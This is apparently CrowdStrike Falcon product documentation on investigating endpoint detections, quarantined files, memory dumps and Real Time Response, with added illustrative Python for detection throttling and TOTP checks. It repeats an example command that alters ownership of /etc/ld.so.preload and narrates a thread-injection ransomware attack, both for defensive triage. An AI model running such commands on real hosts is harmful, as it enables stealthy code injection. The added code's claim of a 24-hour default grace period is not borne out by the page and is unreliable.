  • Save the graph, or open a saved graph to view it in the process tree.

Process tree examples

In this simple example, a root process spawned Java executables, which eventually spawned a PowerShell executable.

Simple process tree example

A more complex example shows how the process tree lets you visualize an attack and understand what happened. In this example, the process tree shows a thread-injection attack that started with Outlook and was attributed to the Fancy Bear adversary.

  1. The host user clicked a link in Outlook, which spawned Firefox, which then spawned a tab in Firefox to run an exploit through excel.exe.

  2. Excel spawned a PowerShell instance, and then PowerShell launched csc.exe, which compiled a malicious DLL.

  3. As indicated by the arrowed line, PowerShell then spawned notepad.exe, which injected a thread back to PowerShell. When the exploit succeeded, the attacker migrated into notepad.exe to bypass blocking.

  4. Hiding under the Notepad process, the attacker wanted to get a better understanding of the attack target’s host and user details. They opened cmd.exe and then ran commands that enabled them to perform reconnaissance and ultimately initiate a ransomware attack through locky.exe.

Process tree example with thread injection

At this point, you can contain the host (if you have the required privileges), or assign the detection to another analyst, adding comments to ensure a smooth handoff during triage. For more info about containing hosts, see Network Containment.

Investigate a detection

You might start a detection investigation in the Process section of the detection’s summary panel. The Specific to this detection value provides information about what’s happening and, in some cases, includes suggestions for how you might respond.

Specific to this detection field

Multiple options enable you to deepen your investigation or go to different contexts:

  • Investigate the associated host or view the host in the asset graph

  • Investigate an associated event

  • Investigate an associated hash

  • View a related incident

  • Analyze the command line with Charlotte AI for an explanation of the command's behavior and effects. Analysis shows directly within the detection.

Important: When a detection or prevention is triggered for an IOA or IOC, CrowdStrike recommends reviewing the host and process tree for events that may show additional context. Events can occur both before and after the detection that may suggest related adversary activity, such as credential access, lateral movement, data exfiltration, or file encryption. Adversaries often attempt to perform many activities on a host, so CrowdStrike recommends that your organization perform additional review and risk mitigation when detections and preventions occur.

Detections with cloud-based ML technique

Most detections occur when a process runs, but cloud-based machine learning (ML) detections can also occur when the file is written to disk. These detections include details such as the triggering file, the file path, and the hash value.

You can tell which cloud-based ML detections are detected on write because the Specific to this detection value includes this notation:

This process wrote a suspicious file to disk. That associated file meets the ML threshold. Review the file.

Take action on a detection

The specific actions that you can take on a detection depend on the detection type and your Falcon subscription. Examples of actions that you can take from within a detection:

  • Edit the detection’s status, assignment, or tags, or add a comment. Bulk editing is supported. For more info, see Endpoint detection management.

  • Investigate the host.

  • Connect to the host so you can take direct action through Falcon Real Time Response.

  • Limit the host’s access to the network by containing the host.

  • Lift file system containment.

  • Create an IOA exclusion.

  • Review quarantined files that result from detections.

  • Launch a hash search in Google or Falcon event search.

Monitor custom IOA detections and preventions

Detections and preventions triggered by Custom IOA rules appear in the Activity app like other CrowdStrike detections. They are distinguished by the Tactic and Technique of Custom Intelligence via Indicator of Attack. In the Execution Details of a custom IOA detection, the Custom IOA Rule field provides a link to the rule that triggered the detection.

The four events associated with the four rule types are:

  • CustomIOABasicProcessDetectionInfoEvent (Process Creation)

  • CustomIOAFileWrittenDetectionInfoEvent (File Creation)

  • CustomIOANetworkConnectionDetectionInfoEvent (Network Connection)

  • CustomIOADomainNameDetectionInfoEvent (Domain Name)

Read more about the event types that trigger custom IOA detections in Events Full Reference (Events Data Dictionary).

Investigate reconstructed commands

When Extended Command Line Visibility is enabled on a prevention policy, you can investigate reconstructed commands in several areas in the Falcon console. To enable this setting on your prevention policy, see Enable Extended Command Line Visibility.

Reconstructed commands on the Detection page

When the Extended Command Line Visibility policy is enabled, the process full details page shows the reconstructed command line. This example shows this reconstructed command; its target, /etc/ld.so.preload, lists libraries that the dynamic loader injects into every dynamically linked process on the host, which is why a change to that file's ownership deserves a close look:

sudo chgrp dummy /etc/ld.so.preload | tee temp1

To investigate:

  1. Go to Endpoint security > Monitor > Endpoint detections.

  2. On the Detections page, find the detection that corresponds to your reconstructed command.

  3. Click Open menu and then click Details view.

  4. On the Details view, scroll down to Full details to see the Reconstructed command line.

The detections view showing the reconstructed command field which is included when the Extended Command Line Visibility policy is enabled.

Reconstructed commands in the process table

When the Extended Command Line Visibility policy is enabled, the process table shows the reconstructed command line. This example shows this reconstructed command:

sudo chgrp dummy /etc/ld.so.preload | tee temp1

To investigate:

  1. Go to Endpoint security > Monitor > Endpoint detections.

  2. On the Detections page, find the detection that corresponds to your reconstructed command.

  3. Click Open menu , and then click Process table.

  4. On the process that opens, locate the Reconstructed command line.

The process table showing the reconstructed command field which is included when the Extended Command Line Visibility policy is enabled.

Reconstructed commands in the process tree

When the Extended Command Line Visibility policy is enabled, the process tree shows the reconstructed command line. This example shows this reconstructed command:

sudo chgrp dummy /etc/ld.so.preload | tee temp1

To investigate:

  1. Go to Endpoint security > Monitor > Endpoint detections.

  2. On the Detections page, find the detection that corresponds to your reconstructed command.

  3. Click Open menu, and then click Process tree.

  4. On the Execution details panel that opens, locate the Reconstructed command line.

The process tree showing the reconstructed command field which is included when the Extended Command Line Visibility policy is enabled.
Reconstructed commands in the Process Graph

When the Extended Command Line Visibility policy is enabled, the process graph shows the reconstructed command line. This example shows this reconstructed command:

To investigate:

  1. Go to Endpoint security > Monitor > Endpoint detections.

  2. On the Detections page, find the detection that corresponds to your reconstructed command.

  3. Click Open menu, and then click Process graph.

  4. On the Execution details panel that opens, locate the Reconstructed command line.

The process graph showing the reconstructed command field which is included when the Extended Command Line Visibility policy is enabled.

Endpoint detection management

You can edit a single detection or bulk-edit multiple selected detections. Change a detection’s status, change the assignee, apply tags, and add comments.

Detection assignment

Assign detections to individuals, claim the ones you’ll work on, or transfer your ownership of a detection to a colleague. Apply the Assigned to filter to see who’s working on what.

Important notes for Falcon Flight Control and multi-CID deployments:

  • To assign detections, you must have access to the CID where the detection was triggered and a role for viewing and assigning detections in that CID.

  • The list of assignable users includes anyone with access to the CID and a role with permissions for managing detections. When assigning detections from the parent CID, the list of assignable users also includes parent-level users.

  • For security purposes, to see a user in the assignee list, you must have access to the user’s home CID with role permissions that allow you to view users in that CID.

Detection status

Detection status info helps you understand whether detections are currently being investigated.

CrowdStrike automatically assigns a status value of New to all new detections. You can also re-apply the New status to detections as needed.

Assign these detection statuses as needed to support your organization’s detection investigations:

  • New

  • In Progress

  • Closed

  • Reopened

Detection tags

Tags can help you organize and filter your detections. Apply popular tags that are available with the Falcon platform, or create your own custom tags.

Applying the true_positive tag to detections can reveal opportunities for your team to adjust your prevention policy settings. Applying the false_positive tag to detections can help your team refine your blocklist and allowlist.

To edit the status of a detection and apply tags:

  1. Go to Endpoint security > Endpoint detections and click Open menu.

  2. Select Edit status.

  3. Choose a status: New, In progress, Reopened, or Closed.

    • If you select Closed, you have the option to select one of the predefined system tags Mark as True Positive or Mark as False Positive.

      The Edit status dialog with the status set to Closed showing the predefined system tags Mark as True Positive or Mark as False Positive.
    • If you select New, you can click the Tags dropdown menu to see the true_positive or false_positive options.

      The Edit status dialog with the status set to New and the Tags dropdown menu open.
  4. Click Update status.

You can also filter detections by true_positive and false_positive tags. When you apply these tags, you will see an additional column called Resolution. This column gives you visibility into which detections are true positive detections, and which are false positive detections.

Notes:

  • You will only see the additional Resolution column if there are detections in your environment with at least one tag matching false_positive or true_positive.

  • If a detection has both true_positive and false_positive tags, True positive will display in the Resolution column.

The Detections page with the Resolution column highlighted.
Edit one or more detections
  1. In the detection’s Open menu or summary panel, click Edit status.

    Tip: To bulk-edit multiple detections, select the checkboxes for the detections that you want to edit, and then click Edit.
  2. From the Status list, select a status value for the detection.

  3. From the Assigned to list, select an assignee for the detection.

  4. Optional. In Detection tags, apply or create tags as needed.

  5. Optional. Add a descriptive comment.

  6. Click Update status.

How detections are recorded

Terminology:

  • Agent ID (AID): Every sensor in your environment is uniquely identified by its Agent ID, or AID. If you have 5,000 sensors, you will have 5,000 unique agent IDs. Agent IDs are globally unique across all customer environments.

  • Customer ID (CID): Used to identify customer environments. Every environment has a unique CID.

  • Pattern ID: Every detection is associated with a pattern, and each pattern has a unique ID.

Falcon has rules in place so it doesn’t display redundant detections in the console or inundate users with more emails than needed:

  • Detections are not recorded or shown if they match an exclusion pattern.

  • The console displays up to 1,000 detections per day for a single Agent ID. If there are more than 1,000 detections for a host, it’s a clear indication that it should be investigated.

  • Detections are sent no more often than once every five seconds for each Pattern ID + AID pair.

  • When a CID + AID + Pattern ID group is on the same process ID, it is compressed to one pattern hit.

  • Falcon sends one email per day for each detection. For example, if a detection has 100 pattern hits on it in the same day, only one email will be sent out to each contact set up to receive detection alerts. If there are additional pattern hits the following day, contacts will receive another email.
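The recording rules above as an added, illustrative model (not CrowdStrike's implementation): a small in-memory recorder applies exclusion, same-process compression, the five-second rate per Pattern ID + AID pair, the 1,000-per-day cap per AID, and the one e-mail per detection per day rule to a constructed stream of events. All event fields, IDs and timestamps are constructed for the example.

```python
from collections import defaultdict
from dataclasses import dataclass, field

DAILY_CAP_PER_AID = 1000     # the console displays up to 1,000 detections per day per AID
MIN_INTERVAL_SECONDS = 5     # one detection per Pattern ID + AID pair every five seconds or more
DAY_SECONDS = 86_400


@dataclass(frozen=True)
class Event:
    """One pattern match reported by a sensor (all fields constructed for the example)."""
    cid: str
    aid: str
    pattern_id: int
    pid: int
    ts: int  # seconds since the Unix epoch


@dataclass
class DetectionRecorder:
    """In-memory model of the recording, compression and e-mail rules (not Falcon's code)."""
    excluded_patterns: frozenset
    last_sent: dict = field(default_factory=dict)                          # (pattern_id, aid) -> ts
    hit_counts: dict = field(default_factory=lambda: defaultdict(int))     # detection key -> pattern hits
    shown_per_day: dict = field(default_factory=lambda: defaultdict(int))  # (aid, day) -> detections shown
    emails: list = field(default_factory=list)                             # (detection key, day) e-mailed

    @staticmethod
    def day_of(ts):
        return ts // DAY_SECONDS

    def _email_once_per_day(self, key, day):
        # One e-mail per detection per day, however many pattern hits it collects that day.
        if (key, day) not in self.emails:
            self.emails.append((key, day))

    def ingest(self, ev):
        """Return what happened to the event: excluded, compressed, throttled, capped or recorded."""
        if ev.pattern_id in self.excluded_patterns:
            return "excluded"                # matches an exclusion pattern: neither recorded nor shown
        key = (ev.cid, ev.aid, ev.pattern_id, ev.pid)
        day = self.day_of(ev.ts)
        if key in self.hit_counts:
            # Same CID + AID + Pattern ID on the same process ID: one more hit on the existing detection.
            self.hit_counts[key] += 1
            self._email_once_per_day(key, day)  # a hit on a later day sends one more e-mail
            return "compressed"
        pair = (ev.pattern_id, ev.aid)
        last = self.last_sent.get(pair)
        if last is not None and ev.ts - last < MIN_INTERVAL_SECONDS:
            return "throttled"               # faster than once per five seconds for this Pattern ID + AID
        if self.shown_per_day[(ev.aid, day)] >= DAILY_CAP_PER_AID:
            return "capped"                  # host already at 1,000 today: the host itself needs investigating
        self.last_sent[pair] = ev.ts
        self.shown_per_day[(ev.aid, day)] += 1
        self.hit_counts[key] = 1
        self._email_once_per_day(key, day)
        return "recorded"


def run_sample():
    """Feed a constructed burst of events from one host through the recorder."""
    rec = DetectionRecorder(excluded_patterns=frozenset({999}))
    t0 = 1_700_000_000
    events = [
        Event("cid-A", "aid-1", 42, 1234, t0),                     # first hit: recorded, e-mail sent
        Event("cid-A", "aid-1", 42, 1234, t0 + 1),                 # same process: compressed into it
        Event("cid-A", "aid-1", 42, 5678, t0 + 2),                 # new process within 5 s: throttled
        Event("cid-A", "aid-1", 42, 5678, t0 + 6),                 # new process after 5 s: recorded
        Event("cid-A", "aid-1", 999, 1, t0 + 7),                   # excluded pattern: dropped
        Event("cid-A", "aid-1", 42, 1234, t0 + DAY_SECONDS + 10),  # next-day hit: one more e-mail
    ]
    return [rec.ingest(e) for e in events], rec


def flood_one_host(n_events):
    """A distinct process every 5 s on one host: only the first 1,000 per day are displayed."""
    rec = DetectionRecorder(excluded_patterns=frozenset())
    start = 19_676 * DAY_SECONDS  # constructed: exactly at a day boundary
    outcomes = [rec.ingest(Event("cid-A", "aid-2", 7, pid, start + 5 * pid)) for pid in range(n_events)]
    return outcomes.count("recorded"), outcomes.count("capped")


if __name__ == "__main__":
    outcomes, rec = run_sample()
    print(outcomes, "e-mails:", len(rec.emails))
    print("flood of 1,100 events:", flood_one_host(1100))
```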

Detection icons

Detection icons help you instantly get key information about a detection.

Severity colors

Colors help indicate the severity of a detection. For example, in the default color scheme, an orange icon represents a high-severity detection. Colors make it easy to identify and prioritize security events.

Default severity colors:

  • Critical: Red

  • High: Orange

  • Medium: Yellow

  • Low: Green

  • Informational: Blue

Disposition and attribution icons

Disposition and attribution icons help you quickly triage detections without opening their summary panels.

Disposition icons help you learn whether an associated activity was blocked or killed. If you need more detailed info, you can open the detection’s summary panel and review the Actions taken info in the Process section.

Icons can also indicate whether a known adversary was involved or whether a detection was generated by the Falcon OverWatch team.

  • Check mark: The process was blocked, and the detection was resolved.

  • Green dot: The detection was partially resolved. For example, the parent process or a subprocess was killed, an operation was blocked, or a file was quarantined.

  • Gray dot: The detection would have been resolved, but wasn’t. This disposition can help you identify opportunities to adjust your prevention policy settings.

  • Actor attribution: The detection is attributed to an adversary that’s monitored by CrowdStrike.

  • Falcon OverWatch: The detection was generated by the Falcon OverWatch team. For more info, see Falcon OverWatch.

Detections accessibility keyboard shortcuts

  • TAB: When in the main navigation or summary panel, moves through all nav items sequentially. In the Activity App, sequentially navigates to each row and each column by using every focusable element inside a row (buttons, links, and so on).

  • UP/DOWN arrow: Navigates the main navigation or opens a drop-down list. In the Activity App, skips to the previous/next row (as long as a row has focus).

  • RIGHT/LEFT arrow: When in the main navigation, takes you into the sub-menu.

  • ENTER/SPACEBAR: Opens/closes a detection or aggregation row, or selects a process row or metadata button inside a process row.

Mobile Detection Monitoring

Monitor mobile detections to understand the activity happening in your environment.

Requirements

  • Subscription: Falcon for Mobile

  • System requirements: None

  • Roles: Falcon Administrator, Mobile Admin

Working through mobile detections

View detections from Android and iOS hosts in Mobile detections (Endpoint security > Monitor > Mobile detections).

Mobile detections are also available in the unified detections view. For more info, see Detection Monitoring.

You can perform these actions on mobile detections:

  • View detection details, such as the user and mobile host involved.

  • Update the detection status.

  • Assign the detection to a user for further investigation or resolution.

  • Add tags or comments to the detection.

You can also create scheduled searches to send email notifications when specific detections are found. For more info, see Scheduled Searches.


The Mobile Detections page
Note: Mobile detections appear in the Falcon console for 90 days after they're generated. After 90 days, mobile detections aren’t guaranteed to be retained.
Viewing mobile detections

The Mobile Detections page displays the list of detections found on Android and iOS devices. You can search or filter the list and view details for individual detections.

  1. Go to Mobile detections (Endpoint security > Monitor > Mobile detections).

  2. Use the Search or filter menus to find specific types of detections. Type the search criteria or select the filter and then click Apply.


    Filtering mobile detections
  3. Show or hide table columns by clicking Configure table columns.
  4. From Manage detections attribute templates or the Open menu, customize detection attributes to adjust what information appears in the list of detections, helping you triage detections more quickly and easily. For more info, see Detection Attribute Management.

  5. Click a detection to display the summary panel.

  6. To view full details of a detection, select Actions > View details or click See full detection.


    Viewing full detection details
Modifying mobile detections

Update the status, assign a user, or add tags and comments to mobile detections.

  1. Go to Mobile detections (Endpoint security > Monitor > Mobile detections).

  2. Select one of these options:

    • Modify a single detection: Locate the detection and from the action menu, select Edit detection.


      Modifying a single detection
      Tip: You can also modify a detection from the summary panel by using the Actions menu.
    • Bulk modify detections: Select the detections and click Edit.


      Bulk modifying detections
  3. Modify the detection as needed.

    • Use the Status and Assigned to menus to change the status or assign a user.

    • Enter a new tag or remove existing tags using the Detection tags field.

    • Enter a comment in the Add comment field.

  4. Click Update detections.

Quarantined Files

View, manage, and release quarantined files.

Requirements

  • Subscription: Falcon Insight XDR, Falcon Prevent required for preventions

  • Sensor support: All supported versions of Falcon sensor for macOS, Windows, and Linux

  • System requirements: None

  • Roles: Falcon Administrator, Falcon Security Lead, Falcon Investigator, and Falcon Analyst roles have permission to manage detections and incidents. For full details about the roles required to perform specific actions on detections and incidents, see Roles for Falcon Insight Next-Gen SIEM.

About quarantined files

When a detection involves a quarantined file, it's shown in the detection summary panel in Endpoint detections.


View quarantined files

  1. In the Falcon console, go to Endpoint security > Monitor > Quarantined files.

  2. Use the filter bar at the top to filter the list of quarantined files. For example:

    • Status:Deleted

    • Filename:CSQ.exe

Note: Unreleased quarantined files are automatically deleted from the host after 30 days. Unreleased quarantined files uploaded for Falcon Intelligence and other Falcon subscriptions are deleted from the CrowdStrike cloud after 90 days.

Release a file

When you release a file from quarantine, it's allowed to execute on that host. Releasing a file does not affect other hosts. To avoid triggering more preventions on other hosts, add the file to your global allowlist.

Note: Files that appear in Endpoint security > Monitor > Remediation are also available in Endpoint security > Monitor > Quarantined files and updates are reflected in both places.
  1. In the Falcon console, open Endpoint security > Monitor > Quarantined files.

  2. Select the files you want to release. To release files in bulk, filter files by quarantined status and click Select All.

  3. Click Release.

Tip: Filter by quarantined status and use the Select All checkbox to release files in bulk.

Screenshot of quarantined files table with the release icon highlighted
Note: Quarantined files from removable media are released to C:\ProgramData\CrowdStrike.

If the host is offline, quarantined files are released when the host comes back online within 30 days. If the host remains offline for 30 days, the file stays quarantined.

Undo a released file

When you undo a release, the Falcon sensor treats the file as malicious again. The next time the file attempts to execute, the sensor blocks and quarantines it again. The sensor does not quarantine the file immediately.

  1. In the Falcon console, go to Endpoint security > Monitor > Quarantined files.

  2. Select the released files you want to quarantine again.

  3. Click Undo Release.


Screenshot of quarantined files table with the undo release icon highlighted

Download a file

You can download a file from the Falcon console for further investigation. This requires you to enable Upload quarantined files at Support and resources > Resources and tools > General settings on the Quarantined files tab. By default, file extraction is disabled.

  1. In the Falcon console, go to Endpoint security > Monitor > Quarantined files.

  2. Near the file you want to download, click Download.

  3. Provide the password infected when you unzip the downloaded file.

Note: Files that appear in Remediation are also available in Quarantined files, and updates are reflected in both places.

Screenshot of the quarantined files table with the download file icon highlighted

Delete a file

  1. In the Falcon console, go to Endpoint security > Monitor > Quarantined files.

  2. Select the files you want to delete.

  3. Click Delete.

Tip: Filter by quarantined status and use the Select All checkbox to delete files in bulk.

Screenshot of the quarantined file table with the delete icon highlighted

File extraction FAQs

  • Encryption: Extracted files are encrypted in transit and at rest

  • File size: Files up to 32 MB can be downloaded

  • Permissions: Users with the roles Falcon Admin and Falcon Security Lead can download extracted files

  • Operating systems: Windows, macOS, and Linux

Triggered Memory Dumps

Learn how to enable triggered memory dumps. Discover how this data is collected and stored.

Overview

A memory dump is a snapshot of memory taken at a specific time. The granularity of a memory dump depends on the type of memory dump. Triggered memory dumps currently support the taking of a process memory dump, which is a record of the memory of a single application. Memory dumps are obtained and uploaded to the cloud when the Falcon sensor or a CrowdStrike security analyst has identified suspicious activities on the endpoint.

Requirements

Subscription: Falcon Insight XDR

Sensor support: All supported versions of Falcon sensor for Windows

CrowdStrike clouds: Available in US-1, US-2, and EU-1

System requirements: None

Roles:

  • Falcon Administrator can enable triggered memory dumps.

About triggered memory dumps

CrowdStrike can open memory dumps in a debugger, which allows its analysts to perform the following actions.

  • Confirm adversarial activity.

  • Improve CrowdStrike detection technology.

  • Extract malicious commands, in-memory plugins, scripts, and modules.

These insights support the continued enhancement of CrowdStrike's protection capabilities and threat intelligence.

Memory dumps are collected and securely uploaded to the cloud when suspicious activity is identified by the Falcon sensor or a CrowdStrike security analyst, based on their professional judgment. The memory dumps are then processed offline by CrowdStrike to confirm threats, enhance detection, and extract malicious data.

Because memory dumps may contain personally identifiable information (PII) or other sensitive information, they are protected by several methods.

  • Encryption: Memory dumps are encrypted both in transit and while stored. They never reside unencrypted on disk on the originating endpoint or in cloud storage.

  • Role-based access controls: Memory dumps are stored in an S3 bucket with role-based access controls granted according to the principle of least privilege.

  • Retention: Memory dumps are retained in the cloud per the terms of contractual retention agreements.

  • Auditing: Users can identify the memory dumps that have been collected using Event Investigation.

Triggered memory dumps are different from Real Time Response (RTR) memory dumps. An RTR memory dump can only be done by a customer with the correct security role or Falcon Complete. This process takes longer than a triggered memory dump, and might mean that information about the adversary is overwritten before the memory dump is approved. For more info, see Real Time Response.

Configure memory dumps

Triggered memory dumps can be enabled by Falcon Administrators. In the Falcon console, go to Support and resources > Resources and tools > General settings. Click Triggered memory dumps, and enable the toggle.

Remediations

View the remediation actions that the Falcon platform has taken on detections.

Requirements

  • Subscription: Falcon Insight XDR, Falcon Prevent required for preventions

  • Sensor support: All supported versions of Falcon sensor for macOS, Windows, and Linux

  • System requirements: None

  • Roles: Falcon Administrator, Falcon Security Lead, Falcon Investigator, and Falcon Analyst roles have permission to manage detections and incidents. For full details about the roles required to perform specific actions on detections and incidents, see Roles for Falcon Insight Next-Gen SIEM.

About remediations

In Remediation, view the remediation actions Falcon has taken on detections. Refine the list of detections using filters, which allow you to focus on attributes including Remediation type, Time, Severity, Tactic, and Technique.

The Advanced Remediation prevention policy setting must be enabled for Falcon to perform remediation actions.

Read more about the setting and the actions that Falcon can perform in Prevention Policy Settings.

Getting to Remediations

  1. Go to Remediation (Endpoint security > Monitor > Remediation) to see all of the detections that have had automated remediation activity performed in the last 90 days.


screenshot of the remediation page

Review the remediation actions performed on a detection

  1. On the Remediation page (Endpoint security > Monitor > Remediation), click any detection to go to the full details of the remediation action performed.


screenshot of the remediation actions page for a detection

The remediation page for a detection shows complete information about the remediation actions performed on a detection.

  • Go to full detection button: Open the detection that triggered the automated remediation in a new tab.

  • Hosts tab: Basic information about the hosts where the remediation was performed, and a link to go to its full details in Host Management.

  • Vulnerabilities tab: A quick overview of vulnerability information about the hosts involved in the detection, and a link to go to more details on the Vulnerabilities page (requires a subscription with vulnerability management).

  • Detection information: Essential details about the detection, including whether the process was killed or blocked, Description, and Command line, if applicable.

  • Remediation timeline: A complete list of all remediation actions.

    • Click the copy icon to copy the details of a remediation.

    • These actions might appear:

      • File quarantined

      • Process killed

      • Registry value deleted

  • Audit log: Shows the actions taken by your organization’s Falcon users.

Response

Real Time Response

Connect to and run commands on hosts from the Falcon console.

About Real Time Response

Use real time response to run commands on a Windows, macOS, or Linux host directly from the Falcon console. Real time response gives you more sophisticated incident response options beyond network containing a host, and you can connect to an online host immediately from any location. For more info, see Network Containment.
Note: Real time response is not available for ChromeOS hosts.

You can use real time response to perform many common response and remediation tasks.

  • List running processes and kill processes

  • Show network connections

  • Navigate the file system, get or delete files, and perform many file system operations

    Note: The get command can only download files that are present on the host. Cloud storage and sync options that make files available only through cloud connections, such as OneDrive, are not supported.
  • Upload files

  • Remotely restart or shut down a host

  • Manage and run your own custom scripts or executables

Additional capabilities for Windows hosts:

  • Retrieve memory dumps

  • Query, create, or modify registry keys

  • Collect diagnostic logs and stateful information about a host

Requirements
  • Subscription:

    • Falcon Insight XDR

    • Falcon Identity Threat Protection with Falcon Prevent

    • Falcon Control and Respond with Falcon Prevent

  • Sensor:

    • All supported versions of Falcon sensor for Windows, macOS, and Linux.
      Note: Falcon Container does not support Real Time Response for pods.
  • CrowdStrike clouds: For US-GOV-1 and US-GOV-2, Real Time Response and the RTR GET command are disabled by default. Contact Support to enable these functions.

  • Windows hosts system requirements:

    • PowerShell: 3.0 or later is recommended; at least 2.0 is required. PowerShell constrained language mode must not be enabled.
      Note: Windows 10 ARM64 provides only an x86 version of Powershell.exe. As a result, RTR scripts are run using WOW64 emulation, which redirects certain registry and filesystem accesses to alternate locations specifically for x86 processes. For example, an attempt to access %WINDIR%\System32 is redirected to %WINDIR%\SysWOW64. To access the native System32 directory, use %WINDIR%\Sysnative instead. If you upgrade to Windows 11, you get a 64-bit version of Powershell.exe that is not subject to these redirects. After an upgrade to Windows 11, the Falcon sensor uses the 64-bit version on the next sensor update or reinstall.
    • .NET Framework: 4.5 or later is recommended, and is required to use the zip and encrypt commands. At least 3.5 is required in all cases.

  • macOS hosts system requirements:

    • zsh: Real Time Response is hardcoded to use the system zsh located at /bin/zsh.

  • Linux hosts system requirements:

    • Bash: 3.0 or later is required.

  • Policy requirements: To perform Real Time Response, the target host must be in a group associated with a response policy that has Real Time Response enabled.

  • Network access: A host must be online for you to connect to it. You can connect to a host even when it's been network contained.

  • Roles:

    • You must have a Real Time Responder role or custom role with the required Real Time Response permissions to connect to a host. For more info, see Individual command permissions for custom roles.

    • The Falcon Administrator role doesn't include access to Real Time Response.

    • You must assign a Real Time Responder role or equivalent custom role permissions to each user that needs access to perform Real Time Response actions.
      Important: You should only assign RTR Active Responder and RTR Administrator roles to experienced incident response staff. Users with these roles can execute potentially destructive commands on your hosts.
Getting started with Real Time Response

If you have never used Real Time Response in your environment before, familiarize yourself with the following concepts and setup tasks:

Real Time Responder roles

Falcon has 3 default Real Time Responder roles to grant users access to different sets of commands to run on hosts.

  • Real Time Responder - Read Only Analyst (RTR Read Only Analyst) - Can run a core set of read-only response commands to perform reconnaissance

  • Real Time Responder - Active Responder (RTR Active Responder) - Can run all of the commands RTR Read Only Analyst can and more, including the ability to extract files using the get command, run commands that modify the state of the remote host, and run certain custom scripts

  • Real Time Responder - Administrator (RTR Administrator) - Can do everything RTR Active Responder can do, plus create custom scripts, upload files to hosts using the put command, and directly run executables using the run command

For full details about the commands each default RTR role can run, see Real Time Response commands and default user role permissions.

Users can also run RTR commands if they have a custom role with the necessary granular permissions. For more info, see Individual command permissions for custom roles.

Individual command permissions for custom roles
Note: The RTR console supports RTR granular permissions. However, API clients that connect to the Falcon console use a separate scope-based permissions model that does not support RTR granular permissions.

You can use custom roles to provide users with granular permissions to individual RTR commands. This allows users to execute only the commands that are required for their specific roles.

Note: Only Falcon Administrators can create custom roles.

For info about how to create a custom role, see Creating custom roles.

Running RTR commands

Important: If the necessary permissions aren’t enabled for users running RTR commands, connection attempts to a host will fail.

To run RTR commands, you must have either a default RTR role or a custom role that enables the 4 permissions mentioned in these steps:

  1. On the Roles and permissions page, under each respective permissions group, click Edit permissions.
  2. Enable each of these permissions:
    • Host Management > Read device details
    • Response Policies and Settings > View Response policies
    • Real Time Response > Write RTR commands
    • Real Time Response > Read RTR command responses
    Note: The Read device details permission grants access to the Host management page in the Falcon console. The other permissions are required for the Connect to host action to be available for hosts listed on the Host management page.
  3. Click Save.

To run RTR commands as a user with a custom role, you also need to enable permissions for RTR commands.

  1. On the Roles and permissions page, under the Real Time Response group, click Edit permissions.
  2. Enable either of these types of permissions:
    • Any of the Execute permissions for individual RTR commands, or
    • Any of the Activate permissions for groups of RTR commands
  3. Click Save.

For more info about enabling permissions, see Edit custom role permissions.

Real Time Response identity verification

Real Time Response (RTR) identity verification allows you to enforce multi-factor authentication (MFA) on certain RTR risk-based operations. With Falcon MFA for RTR enabled, users are prompted for additional authentication when attempting to execute a designated task during an RTR session. This additional layer of security helps improve your zero-trust security posture and safeguard against potentially damaging effects of malicious or incorrect use.

About Falcon MFA for RTR

Falcon MFA for RTR uses time-based one-time password (TOTP) authentication to validate the identity of users. With TOTP, users are required to enter a 6-digit code that’s generated by an authentication app on their mobile device before they’re allowed to perform an MFA-enforced operation.

Note: A TOTP code used during Falcon login also authenticates the user for MFA for RTR identity verification. This authentication remains valid until the grace period defined in the MFA for RTR section of your account's General Settings ends. After logging in to Falcon with MFA, users who attempt to perform an MFA-enforced RTR action within the grace period will not be prompted to re-authenticate.

Account configuration

Falcon MFA for RTR is enabled and configured for all users in your organization from the General settings page. When defining MFA for your CID (customer ID), you choose when and how often users are prompted to verify their identity.

  • Gated UI action: You can apply Falcon MFA to one of these RTR triggers:

    • Before initiating any RTR session or action

    • Before running a 'run' or 'kill' command or quick action

    • Before enabling a Fusion SOAR workflow with any RTR action

  • Grace period: Configuration also includes setting a grace period for MFA prompts. During this period of time, a user can perform the MFA-enforced action without being prompted again for authentication. When the grace period expires, the user is prompted to reauthenticate with a TOTP code.
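How the TOTP check and the grace period described in this section fit together, as an added example that is not part of the Falcon documentation or product code: an RFC 6238 TOTP verifier plus a small gate that lets an MFA-enforced action proceed without a new prompt while an earlier verification (including the one used at console login) is still inside the grace period. The shared secret, user names and timestamps are constructed; the 24-hour grace period is the default this page states.

```python
import hashlib
import hmac
import struct

TOTP_STEP_SECONDS = 30            # RFC 6238 default time step
TOTP_DIGITS = 6                   # 6-digit codes, as the page describes
GRACE_PERIOD_SECONDS = 24 * 3600  # the 24-hour default grace period stated on the page


def totp_code(secret, unix_time, step=TOTP_STEP_SECONDS, digits=TOTP_DIGITS):
    """RFC 6238 TOTP (HMAC-SHA1) for the time step that contains unix_time."""
    counter = struct.pack(">Q", unix_time // step)
    mac = hmac.new(secret, counter, hashlib.sha1).digest()
    offset = mac[-1] & 0x0F                                        # RFC 4226 dynamic truncation
    binary = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(binary % (10 ** digits)).zfill(digits)


def verify_totp(secret, submitted, unix_time, window=1):
    """Accept the code for the current step or one step either side, to tolerate clock skew."""
    for delta in range(-window, window + 1):
        expected = totp_code(secret, unix_time + delta * TOTP_STEP_SECONDS)
        if hmac.compare_digest(expected, submitted):               # constant-time comparison
            return True
    return False


class RtrMfaGate:
    """Per-user record of the last successful TOTP and the grace-period decision for gated actions."""

    def __init__(self, secrets, grace_seconds=GRACE_PERIOD_SECONDS):
        self.secrets = secrets       # user -> TOTP secret shared with the authenticator app (constructed)
        self.grace = grace_seconds
        self.verified_at = {}        # user -> Unix time of the last successful TOTP verification

    def _verify(self, user, code, now):
        ok = verify_totp(self.secrets[user], code, now)
        if ok:
            self.verified_at[user] = now
        return ok

    def login(self, user, code, now):
        """A TOTP used at console login also satisfies the RTR identity verification."""
        return self._verify(user, code, now)

    def request_gated_action(self, user, now, code=None):
        """Return 'allowed' while a verification is inside the grace period; otherwise 'prompt' for a
        code, and 'allowed' or 'denied' once one is supplied."""
        last = self.verified_at.get(user)
        if last is not None and now - last < self.grace:
            return "allowed"                                       # still inside the grace period
        if code is None:
            return "prompt"                                        # grace period over: ask for a TOTP
        return "allowed" if self._verify(user, code, now) else "denied"


if __name__ == "__main__":
    # RFC 6238 reference secret; at T=59 the 8-digit vector is 94287082, so the 6-digit code is 287082.
    secret = b"12345678901234567890"
    gate = RtrMfaGate({"alice": secret})
    print(gate.login("alice", totp_code(secret, 59), 59))
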